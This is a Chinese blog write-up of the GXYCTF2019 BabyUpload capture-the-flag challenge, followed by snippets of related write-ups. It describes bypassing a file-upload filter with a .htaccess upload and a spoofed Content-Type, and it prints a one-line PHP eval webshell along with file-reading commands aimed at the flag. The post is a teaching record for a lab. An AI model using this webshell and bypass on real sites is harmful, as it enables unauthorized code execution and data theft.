[GXYCTF2019]BabyUpload

最新推荐文章于 2025-03-19 13:21:13 发布
最新推荐文章于 2025-03-19 13:21:13 发布
阅读量308 收藏
点赞数 1
文章标签: 网络安全 php 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/m0_63253040/article/details/125240250
版权

这题学到的新知识还是多的

进入环境就是一个简单的上传功能

经测试发现带ph的文件不能上传

所以我们这里上传.htaccess

这里检测Content-Type所以我们测试发现能上传的有image/jpeg

使得我们接下来上传的图片马可以被当作php文件解析

同时发现上传的马不能够带有<?

所以用

GIF89a

<script language="php"> @eval($_POST['zxc']); </script>

来绕过,且同上需要修改Content-Type才能上传成功

上传成功后会给出目录按如下路径连接

http://72a496d9-bc18-4e4b-9ef5-45813ee3c9c6.node4.buuoj.cn:81/upload/c3b77fe9b6936dbaca31c839de599f81/11.png

如果连接不上,请多试几次,或者检查自己的马,等等其他情况

然后这里在网页直接用hackbar有很多用法

根据在cmd=phpinfo();里可以看见被禁用的函数

cmd=echo file_get_contents('/flag');

cmd=show_source('/flag');

cmd=var_dump(file_get_contents('/flag'));

cmd=var_dump(scandir('/'));

可能还有许多函数可以利用,只要是未被禁用就可以

[GXYCTF2019]BabyUpload - 文件上传+绕过(后缀&文件类型&文件内容&.htaccess)
oZuoShen123的博客
10-11 1037
1、上传一句话,提示“后缀不允许ph” 2、修改后缀为jpg,提示“上传类型也太露骨了吧!” 3、修改类型为image/jpeg,提示“诶,别蒙我啊,这标志明显还是php啊” 4、修改一句话的标识为: @eval($_POST["pwd"]); 5、上传.htaccess
[GXYCTF2019]BabyUpload1 -- 题目分析与详解
2302_79800344的博客
03-03 3888
代码中并没有写传统的一句话木马,因为直接写一句话木马需要关闭系统防火墙。.htaccess 文件。
[GXYCTF2019]BabyUpload1 通关记录
最新发布
2402_88178163的博客
03-19 763
所以他可能是存在对文本内容有后端检测这时我们尝试去掉一句话木马的一些东西比如<> <?上传后发现提示不能有ph 这时phtml php3 php5我们就不进行绕过考虑了 这时我们抓包进行分析看看是哪的问题 这里我们仅仅修改了上传名 改为了jpg后缀 他又给我们进行了报错但是我们可以发现报错内容和不改后缀之前存在不同。发现是可以上传成功的 但是这时候问题就来了 虽然我们成功上传了文件但是它是一个jpg后缀的文件 如果网页不存在文件包含漏洞我们直接访问文件位置 里面的代码是无法被直接解析的。
【CTF】[GXYCTF 2019]BabyUpload
西原一点红的博客
06-19 1129
说明是黑名单,且对上传的类型也做了校验。说明对上传的内容也做了校验。4. 修改上传内容绕过校验。
CTF-WEB[GXYCTF 2019]BabyUpload
02-08
### CTF-WEB[GXYCTF 2019]BabyUpload分析 #### 知识点一:Web安全中的文件上传漏洞 在本题目中,我们面对的是一个典型的Web安全问题——文件上传漏洞。文件上传漏洞是Web应用程序中最常见的安全漏洞之一,它允许...
[GXYCTF2019]BabyUpload 1 文件上传
weixin_45577185的博客
07-22 2040
源码: <?php session_start(); echo "<meta http-equiv=\"Content-Type\" content=\"textml; charset=utf-8\" /> <title>Upload</title> <form action=\"\" method=\"post\" enctype=\"multipart/form-data\"> 上传文件<input type=\"file\" name=\"
【BUU】[GXYCTF2019]BabyUpload
qi_SJQ_的博客
02-07 837
1.本题知识: 图片尺寸小于2000字节,但对文件头没有检验。 检验content-type且只能为jp(e)g,png与gif都不行。 .htaccess配置文件替换。 过滤了一些敏感函数,以及php声明绕过,ph后缀过滤后好像没办法绕过去上传php文件。 2.别人的wp很详尽,我就对被拦截的情况来阐述吧: 后缀名不能有ph:我们后缀只能为jpg上传,但没有文件包含函数可以利用,图片马上传上去没用。因此就可以尝试.htaccess文件替换来将任意后缀解析为php。 AddType applicat
BUUCTF——[GXYCTF2019]BabyUpload
m_de_g的博客
04-17 716
【代码】BUUCTF——[GXYCTF2019]BabyUpload
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值